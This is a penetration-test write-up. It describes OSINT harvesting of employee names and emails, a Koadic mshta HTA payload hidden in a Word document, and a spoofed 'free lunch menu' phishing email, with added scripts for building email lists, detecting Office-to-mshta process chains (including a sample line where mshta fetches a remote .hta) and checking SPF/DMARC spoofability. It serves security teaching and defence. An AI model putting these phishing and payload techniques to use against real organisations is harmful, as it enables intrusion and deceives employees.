
The objective was simple: see how vulnerable the organization is from an external viewpoint and test the effectiveness of the security controls managed enterprise-wide. As such, aside from the company name, we were given ZERO information to carry out the external black-box penetration test.
This black-box external penetration test was performed for a client we will refer to as "Hackme".
OSINT 101
We kicked off with some Open Source Intelligence (OSINT) 101 :). There are quite a lot of open source intelligence tools to help gather emails, subdomains, hosts, employee names, etc. from different public sources such as search engines and Shodan. There is an exhaustive list of such tools here.
Using quite a few of these open source intelligence tools, we obtained publicly accessible documents relating to the organization.
With Google dorks to the rescue, we ran some basic search strings: site:*.hackme.com ext:xls OR ext:docx OR ext:pptx
Of course, our aim was not to tirelessly search for documents. Rather, our aim was to understand the organization's naming schema by analyzing the metadata of the documents, which is found in the "properties section" of each document (most especially Microsoft Word, PowerPoint and Excel files). One could use FOCA for this.

From this, I noticed that employee emails followed a particular naming convention: the first letter of the first name + surname @ domain.com, i.e. [email protected].
Armed with this information, we pulled from LinkedIn the list of all current employees of Hackme using the following Google dork syntax:
site:linkedin.com -inurl:dir "at Hackme" "Current". A typical example is shown below using Google Inc as a reference company.

By hacking together a script to automate the process, we copied out the first names, last names and roles of the current employees of Hackme.
A tiring approach is to manually crawl through the Google result pages in search of these names and roles; alternatively, one could use GoogleScraper:
GoogleScraper -m http --keyword "site:linkedin.com -inurl:dir 'at Hackme' 'Current'" --num-pages-for-keyword 3 --output-filename output.json
Again, I leave the possibilities to your imagination, but you can easily convert this to a .csv file using https://json-csv.com/ or any other converter that works for you.
Then, using your favourite word processor (Word merge, Notepad++, etc.) or some decent scripting skills, merge the firstname + lastname according to the convention to form your email list.
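The two recon steps above (reading the document metadata to learn the naming convention, then turning the scraped LinkedIn names into addresses) are easy to script. The following is an added example, not code from the original write-up: the .docx, the scraper output, the employee names and the domain hackme.com are all constructed for it, and the JSON layout it assumes for the GoogleScraper file (a list of searches, each with a "results" list of {"title", "link"}) is an assumption.

```python
"""
Added example: build the target e-mail list from two recon artefacts.
  1. Pull the author fields out of a .docx's docProps/core.xml (the
     "properties section"; this is what FOCA automates).
  2. Match one of them against a known employee's name to detect the
     organisation's naming convention.
  3. Apply that convention to names scraped from LinkedIn titles.
All inputs below are constructed; the GoogleScraper JSON shape is assumed.
"""
import io
import json
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}


def docx_authors(docx_bytes):
    """Return the creator and lastModifiedBy values from docProps/core.xml."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("docProps/core.xml"))
    values = []
    for tag in ("dc:creator", "cp:lastModifiedBy"):
        el = root.find(tag, NS)
        if el is not None and el.text:
            values.append(el.text.strip())
    return values


# Candidate conventions: (first, last) -> local part of the address.
CONVENTIONS = {
    "flast": lambda f, l: f[0] + l,
    "first.last": lambda f, l: f + "." + l,
    "firstl": lambda f, l: f + l[0],
    "first_last": lambda f, l: f + "_" + l,
    "lastf": lambda f, l: l + f[0],
}


def detect_convention(first, last, observed):
    """Name of the convention that maps (first, last) to the observed username/address."""
    observed = observed.split("@")[0].lower()
    for name, fn in CONVENTIONS.items():
        if fn(first.lower(), last.lower()) == observed:
            return name
    return None


# Public profile titles look like "First Last - Role - Company | LinkedIn".
TITLE_RE = re.compile(
    r"^(?P<first>[A-Za-z'-]+)\s+(?P<last>[A-Za-z'-]+)\s+-\s+"
    r"(?P<role>.+?)\s+-\s+(?P<company>.+?)\s*\|\s*LinkedIn$"
)


def parse_linkedin_titles(scraper_json, company):
    """Return (first, last, role) for every result whose company matches."""
    people = []
    for search in json.loads(scraper_json):
        for result in search.get("results", []):
            m = TITLE_RE.match(result.get("title", ""))
            if m and m.group("company").lower() == company.lower():
                people.append((m.group("first"), m.group("last"), m.group("role")))
    return people


def build_email_list(people, convention, domain):
    fn = CONVENTIONS[convention]
    return sorted({f"{fn(f.lower(), l.lower())}@{domain}" for f, l, _ in people})


def make_sample_docx():
    """Constructed .docx holding only the metadata part we read."""
    core = (
        f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}">'
        "<dc:creator>John Doe</dc:creator><cp:lastModifiedBy>jdoe</cp:lastModifiedBy>"
        "</cp:coreProperties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", core)
    return buf.getvalue()


SAMPLE_DOCX = make_sample_docx()
SAMPLE_SCRAPER_JSON = json.dumps([{"query": "site:linkedin.com 'at Hackme'", "results": [
    {"title": "Alice Smith - Logistics Manager - Hackme | LinkedIn", "link": "https://linkedin.com/in/a"},
    {"title": "Bob Jones - Senior Engineer - Hackme | LinkedIn", "link": "https://linkedin.com/in/b"},
    {"title": "Carol White - Analyst - OtherCo | LinkedIn", "link": "https://linkedin.com/in/c"},
    {"title": "Hackme | LinkedIn", "link": "https://linkedin.com/company/hackme"},
]}])


def run_pipeline():
    creator, modified_by = docx_authors(SAMPLE_DOCX)       # "John Doe", "jdoe"
    first, last = creator.split()
    convention = detect_convention(first, last, modified_by)  # -> "flast"
    people = parse_linkedin_titles(SAMPLE_SCRAPER_JSON, "Hackme")
    return convention, build_email_list(people, convention, "hackme.com")


if __name__ == "__main__":
    print(run_pipeline())
```

The company filter matters: the dork also returns profiles of people who merely mention the company, and the company page itself, which the regex rejects because it has no name and role fields.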
Feed our Target List a Payload
Since we were simulating a black-box penetration test, we decided (just as an attacker would) to gain code execution using malicious payloads. As such, we thought of creating a payload and sending it via email to employees of Hackme.
We also know that it is common practice for some file types/extensions to be blocked by an organization's email filters, to limit exposure to risk.
This brings us to Koadic C3 COM Command & Control, a very decent framework in the same vein as Meterpreter or Empire.
What made it really stand out, aside from the nice interface, is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan the local network for open SMB, pivot to another machine, load Mimikatz and a lot more.
So we ran Koadic and set the necessary variables, using the "stager/js/mshta" module (which serves payloads in memory using MSHTA.exe HTML Applications).

The result was our HTA payload URL, as shown in the screenshot above. However, we need our targets to execute the payload as "mshta payload_url".
In recent years, HTA payloads have been used as a web attack vector and also to drop malware on a victim's PC. We now have to get this payload past our victim's numerous defenses.
Here comes the tricky part: we needed a way to have the victim run "mshta payload_url" without our payload being spawned as a child process of mshta.exe, as we suspected this organization's blue team might flag that.

Luckily, we came across the tip from Matt Nelson shown above, and apparently the team at NCC Group have this implemented in Demiguise.
So here is our final payload, saved as a .hta file.

The next step typically is to deliver our .hta payload as an embedded OLE object.
The intended attack scenario was:
- Send a Microsoft Word document with our .hta payload embedded as an OLE object.
- Get the user to open the Word document and the embedded OLE object.
- This spawns a new process and we get shell access into our victim's PC.
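The process chain this scenario creates (winword.exe starting mshta.exe, and mshta.exe starting whatever the stager runs next) is exactly what a blue team watches for in process-creation telemetry, which is why the child-process concern above matters. The following is an added example, not part of the original write-up: a minimal detector over Sysmon Event ID 1-style records. The field names (Image, ParentImage, CommandLine, ProcessId) follow Sysmon; the events, paths and the 203.0.113.10 address are constructed.

```python
"""
Added example: flag the Office -> mshta -> shell chain in process events.
Events are constructed JSON lines with Sysmon-style field names.
"""
import json
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event):
    """Return the rule names an event trips (empty list when clean)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    # An Office document spawning a scripting host: the embedded package runs here.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # mshta handed a URL: the plain "mshta payload_url" stager.
    if image == "mshta.exe" and URL_RE.search(cmdline):
        hits.append("mshta_remote_url")
    # Anything mshta launches afterwards (cmd, powershell, rundll32, ...).
    if parent == "mshta.exe" and image in SCRIPT_HOSTS - {"mshta.exe"}:
        hits.append("mshta_child_process")
    return hits


def scan(lines):
    """Evaluate JSON-lines events; return [(ProcessId, [rule, ...]), ...]."""
    alerts = []
    for line in lines:
        event = json.loads(line)
        hits = evaluate(event)
        if hits:
            alerts.append((event["ProcessId"], hits))
    return alerts


WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
MSHTA = r"C:\Windows\System32\mshta.exe"

# Constructed telemetry: a user opens the lunch-menu document and the embedded
# package runs (4172 uses a URL, 4180 a dropped local .hta); 4300 and 4320 are noise.
SAMPLE_EVENTS = [
    json.dumps({"ProcessId": 4100, "Image": WORD, "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r'"WINWORD.EXE" "C:\Users\asmith\Downloads\New Lunch Menu.docx"'}),
    json.dumps({"ProcessId": 4172, "Image": MSHTA, "ParentImage": WORD,
                "CommandLine": "mshta http://203.0.113.10:9999/stage.hta"}),
    json.dumps({"ProcessId": 4180, "Image": MSHTA, "ParentImage": WORD,
                "CommandLine": r'mshta "C:\Users\asmith\AppData\Local\Temp\menu.hta"'}),
    json.dumps({"ProcessId": 4204, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": MSHTA,
                "CommandLine": "cmd.exe /c whoami"}),
    json.dumps({"ProcessId": 4300, "Image": MSHTA, "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r'mshta "C:\Program Files\Vendor\setup.hta"'}),
    json.dumps({"ProcessId": 4320, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "chrome.exe"}),
]


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS):
        print(pid, ", ".join(rules))
```

Note that the URL rule alone misses event 4180, where the stager is a local .hta file rather than "mshta payload_url"; the parent/child rule still catches it, which is the point of keying on the process lineage rather than on the command line.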
Now we get to the interesting part: we need our victim to open the Microsoft Word document and our payload.
To do this, we need a very compelling story, simply because users are getting smarter. So we headed back to doing more recon.
...and more recon
We needed to know more about Hackme, especially its culture and employee behaviour. The question we kept asking ourselves was "what would interest the employees?"
Where else to get this information than Glassdoor, a platform that gives you the inside scoop on companies, with employee reviews about salaries, benefits, pros and cons of working for the company.
After poring through reviews of Hackme on Glassdoor, we found some common themes:
- Some employees felt mobility was a problem, as the office is quite a long distance from residential areas.
- Employees love the organization because they get free lunch.

But Wait!
As the old saying goes, the fastest way to a man's heart is through his stomach. So what better way to get the employees to open our payload-embedded Word document?
Send them an email telling them there is a change in the FREE LUNCH menu starting from tomorrow.
Rather than send a random phishing email to employees, which could be spotted easily, we decided a seemingly genuine email would be ideal, complete with a Hackme email signature and observing the organization's email culture.
Now, how do we make our email more believable? By sending an email to Customer Service/Help Desk with a service request and observing the email signature in the response.
... recon again???
We headed back to LinkedIn to look for the name of either the HR Manager, Logistics Manager or Admin Manager (whichever was appropriate) of Hackme. We carefully crafted an email signature with the name we chose.

We're halfway through sending our payload now. Have some patience and read on...
It's time to deliver our payload
From the metadata recon done earlier, we could tell what our target organization's document headers and footers looked like.
I then created a new Word document, similar to the one shown below, as a spitting image of the Hackme document template with the appropriate headers/footers.

Then we embedded our .hta as an OLE object: Microsoft Word Document >> Insert >> Object >> Package. We changed the icon to Microsoft Word's icon and also the caption to reflect our message.

Don't Forget the Anti-virus!!!
To check the AV detection rate of our payload, and to see if it would be flagged as malicious by Hackme's antivirus solution (if any), we did a quick AV scan on nodistribute.com. Nodistribute.com was used because, according to them, they don't distribute payload samples to AV companies. We scanned both the maldoc and the .hta file.

AV scan of our .hta payload (zero detections)

It's Time to Send our Email
If the target organization doesn't have SPF, DKIM and DMARC configured, one can easily spoof the HR Manager's, Logistics Manager's or Admin Manager's email address.
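Whether the manager's address can be spoofed outright, or whether the attacker has to fall back on a look-alike free-mail account, is something you can decide from the domain's published records before sending anything. The following is an added example, not part of the original write-up: it evaluates SPF per RFC 7208 for the mechanisms that need no further DNS lookup (ip4, ip6, include, all), reads the DMARC p= policy, and reports whether a forged header From: would be enforced against. The TXT records stand in for DNS and are constructed, as are the domains hackme.com and hardened.example and the IP addresses.

```python
"""
Added example: offline SPF/DMARC assessment for e-mail spoofing.
The TXT dictionary replaces live DNS; all records are constructed.
"""
import ipaddress

TXT = {
    "hackme.com": ["v=spf1 ip4:203.0.113.0/24 include:_spf.example-mail.net ~all"],
    "_spf.example-mail.net": ["v=spf1 ip4:192.0.2.0/24 -all"],
    # hackme.com publishes no _dmarc record at all.
    "hardened.example": ["v=spf1 ip4:198.51.100.10 -all"],
    "_dmarc.hardened.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@hardened.example"],
}

QUALIFIER = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_txt(name):
    return TXT.get(name.lower(), [])


def spf_record(domain):
    """The single v=spf1 record, or None (none published, or several, which is a permerror)."""
    recs = [r for r in lookup_txt(domain) if r.split() and r.split()[0].lower() == "v=spf1"]
    return recs[0] if len(recs) == 1 else None


def spf_check(domain, sender_ip, depth=0):
    """Return pass/fail/softfail/neutral/none/permerror for mail from sender_ip."""
    if depth > 10:                       # RFC 7208 lookup limit
        return "permerror"
    record = spf_record(domain)
    if record is None:
        return "none"
    addr = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qual = "+"
        if term[0] in QUALIFIER:
            qual, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        if mech in ("ip4", "ip6"):
            try:
                matched = addr in ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"
        elif mech == "include":
            matched = spf_check(arg, sender_ip, depth + 1) == "pass"
        elif mech == "all":
            matched = True
        else:
            continue                     # a, mx, ptr, exists, redirect= need live DNS
        if matched:
            return QUALIFIER[qual]
    return "neutral"                     # nothing matched (RFC 7208 section 4.7)


def dmarc_policy(domain):
    """The p= tag of the domain's DMARC record, or None if none is published."""
    for record in lookup_txt("_dmarc." + domain):
        tags = dict(t.strip().split("=", 1) for t in record.split(";") if "=" in t)
        if tags.get("v", "").upper() == "DMARC1":
            return tags.get("p", "none").lower()
    return None


def spoof_assessment(domain, sender_ip):
    """Would a message with a forged From: <user@domain> sent from sender_ip be enforced against?"""
    spf = spf_check(domain, sender_ip)
    policy = dmarc_policy(domain)
    # SPF on its own only judges the envelope sender, which the attacker chooses
    # freely; only DMARC ties the visible From: header to SPF/DKIM and enforces it.
    enforced = policy in ("quarantine", "reject")
    return {"spf": spf, "dmarc": policy or "none", "header_from_spoofable": not enforced}


if __name__ == "__main__":
    for d in ("hackme.com", "hardened.example"):
        print(d, spoof_assessment(d, "198.51.100.77"))
```

For hackme.com the assessment comes back spoofable: the SPF record ends in ~all and there is no DMARC record, so a forged From: address from an arbitrary IP is at most softfailed and never rejected. That is the situation the write-up describes. Against a domain like hardened.example (p=reject) the attacker is pushed to the display-name trick used in the next step, which no SPF or DMARC policy stops.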
In this case, I created a Gmail account (yes, Gmail works too) using the Logistics Manager's first name and last name, and then spiced it up with his signature obtained earlier.

Let the shells in
Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!

What next?
The rest, as they often say, is history. From here on, using the Mimikatz modules, we escalated privileges, dumped hashes, scanned Hackme's local network, pivoted into other PCs, browsed the target's file systems and even became domain admins, etc.
In conclusion
All in all, this was a really fun engagement. While it may take an attacker a month, two months or a year of dedication to break into an organization through a loophole at the infrastructure level, it can be fairly easy to gain access by exploiting the human factor.
"Once you understand your target environment, devising a creative means of gaining access to the environment becomes fairly easy".
The moral of the exercise is: recon, recon and more recon, for a wise man once said
"Give me six hours to chop down a tree and I will spend the first four sharpening the axe".
Credit:
Rotimi Akinyele – Rotimi is an experienced Cybersecurity, IT Governance, Risk and Compliance (GRC) professional. He is an Assistant Manager, Cybersecurity at BDO UAE.